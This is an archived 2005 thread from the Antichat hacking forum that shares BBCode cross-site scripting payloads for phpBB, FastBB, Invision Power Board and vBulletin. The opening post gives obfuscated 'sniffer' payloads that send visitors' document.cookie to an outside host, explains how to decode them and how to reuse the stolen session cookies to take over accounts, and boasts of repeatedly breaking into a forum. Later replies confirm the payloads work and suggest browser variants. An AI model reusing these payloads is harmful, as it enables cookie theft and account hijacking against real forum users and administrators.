Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Kak lomati phpbb 2.0.18 i nizhe. Koroche na vseh forymah deistvyet. (https://forum.antichat.xyz/showthread.php?t=10613)

queen 08.11.2005 08:37

Kak lomati phpbb 2.0.18 i nizhe. Koroche na vseh forymah deistvyet.
 
Mayalsya Ya opyati ot bezdeliya, i dymaiu....poidy phpbb 2.0.18 vzlomaiu.


Ny potratil nesoliko secund, koroche
lovite kod alerta:

Код HTML:

[url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]wj[/url][/url]
Kod Sniffera:

Код HTML:

[url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]
Yberite znaki "+" V SPEZIUALINIUH simvolah!

http://webmastertools.narod.ru/Onlin...rl_decode.html

Dlya redaktorovaniya kyk von vam ssiulka. Lychsche vsego v Browsere Opera i ne zabydite, chto izmenyaete toliko phpbb2mysql_data a phpbb2mysql_sid mozhete ne menyati i ne trogati.



Sniffak delaetsya ispolizyya ety ssiulky:

http://www.h4cky0u.org/encrypt/index.php

Ny i komy interesno, chitaite ety statiiu dlya profilaktiki

http://forum.antichat.ru/thread10119.html


Kak lomati fastbb po mnogochislennoiu prosibe posetiteleiu antichata.

Alert.

Код HTML:

[font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]][/font]
Sniffer:

Код HTML:

[font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie); ]][/font]
Ne znaiu kak tam v fastbb rabotaet avtorizaziuya ne smotrel, no esli chto, to mozhno vsegda Adminy pomenyati
paroli samomy, potomy chto paroli menyaetsya na noviu, bez starogo.


Viuschla novaya versiya IPB 2.1.3

I lomaetsya eta versiya vot tak:

(Ya proveril, i naschel chto etot ko rabotaet na VSEH 2.* i na vseh 1.* IPB. )



Код HTML:

[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javaSCrip        t:alert(/wj/))`

Kyki voryem vot tak:

Код HTML:

[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`


Ny i vBulletin 3.0.9 (Rabotaet do vBulletin 3.0.7)

Hoti Ya yzhe ego v staroiui statie i viukladiuval, no ne vse kazhetsya ponyali osobenno novichki kak kod pravit chtobiu rabotal.

Sniffer.

Код HTML:

[URL=wj[url]http://www.][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ]wj [/FONT][/url][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ][/FONT][/URL]



Kstati, eto yzhe k wapbbs.


Viu svoiu forum posle moego tretiyago raza kak Ya vas vzlom opyati pochenili, a Ya OPYATI ego vzlomal. )


A kod ne viulozhy potomy chto diury zakroiite opyati i mne opyati pridetsya iskati tegi. Ne horoscho postypaiti Ya vas sorovno kogda hochy lomaiu!!!!! loooooooooool



White Jordan.

Mina 09.11.2005 20:50

Отлично! А это работает на Vbuletin 350?

k1b0rg 09.11.2005 21:12

Цитата:

Mayalsya Ya opyati ot bezdeliya, i dymaiu....poidy phpbb 2.0.18 vzlomaiu.
слухай queen
а тебе не кажеться, что воровать чужое добро плого, в частности заниматся плагиатом
ЭТО ВСЕ коды Белого Джордана, если сам отказываешься в это поверить, то посмотри еще раз на эти коды и убедишься, у меня один в один такие же коды как у тебя, не могли мы с тобою одно и тоже подумать. Так что я думаю, ты сделаешь правильный вывод для себя, и удалишь свою тему.

m0nzt3r 10.11.2005 13:06

Цитата:

Сообщение от k1b0rg
а Wj, закончил свою карьеру=(
изменил свое поведение, свою асю, мыло, ник, стиль общения, и возможно где-то среди нас, но уже совсем другой =(

ага мне тож писал он хотя в моем контакт листе не был... да и вообще надоело наверно быть всеобщим посмешищем=) да кстати эти баги фигня они не проходят=)

Tem 10.11.2005 14:13

в Ipb 2.0.4 всё проходит , просто супер.

k1b0rg 10.11.2005 15:12

Цитата:

ага мне тож писал он хотя в моем контакт листе не был... да и вообще надоело наверно быть всеобщим посмешищем=) да кстати эти баги фигня они не проходят=)
я бы не сказал конечно посмещищем, все таки он был знающим, как не крути но это так
xss и СИ он знал отлично.
а насчет его кодов, да, они работают тока надо немного их доработать, я проверял, все что он написал правда, и работает отлично, даже на ачате.
но я думал, то раньше, что &+#58 это наоборот, чтоб не срабатывало кодируют так, а у него выходит что все нормально.

Net_Gear 11.11.2005 11:36

Цитата:

Сообщение от k1b0rg
я бы не сказал конечно посмещищем, все таки он был знающим, как не крути но это так
xss и СИ он знал отлично.
а насчет его кодов, да, они работают тока надо немного их доработать, я проверял, все что он написал правда, и работает отлично, даже на ачате.
но я думал, то раньше, что &+#58 это наоборот, чтоб не срабатывало кодируют так, а у него выходит что все нормально.

+ уберать надо.

K[o]S 12.11.2005 17:28

WJ Конечно молодец не чё не скажешь!
Но все его XSS коды работают тока в IE.
Но ведь есть FireFoX Opera/
Коды в студию =)

Polisos 14.11.2005 09:13

Цитата:

Сообщение от K[o]S
WJ Конечно молодец не чё не скажешь!
Но все его XSS коды работают тока в IE.
Но ведь есть FireFoX Opera/
Коды в студию =)


нет лол конечно можно сделать так, чтобы работало и в Опере и в Фаерфоксе, но просто как то саму разумеется выкладывается для Ие, а потом читатель дописывает код для той версии браузера, которая ему нужна. Ты вообще знаешь СКОЛЬКО в мире разных браузеров??? Не могу же Я дописывать для каждого браузера коды! Это просто дело времени да и не нужно.

Есть много способов сделать чтобы коды работали в фаерфоксе кстати. Одна из них, эот использовать функцию onmouseover=alert(/wj/)
ну и размер увеличить до такой велечены, чтобы хочешь не хочешь а хер....да много способов есть!

Сам фаерфокс и опера, имеют меньше возможностей чем ИЕ это раз, так что Javascript без тегов и многое другое, не работает ни в фаерфоксе ни в опере.

ИЕ это вообще самый лучшый браузер в мире, но он менее из-за этого защищён.

Я та тут причём

Polisos 14.11.2005 15:32

Цитата:

Сообщение от qBiN
wj ты опять себя выдал :)
Наверно следует ждать бана...хотя хз
А манера писать я как "Я" так и осталась :)

Я себя никогда не прятал. Что значит Я выдал себя? Я сам не знаю почему не банят, и сам не знаю за что банят.


Время: 09:04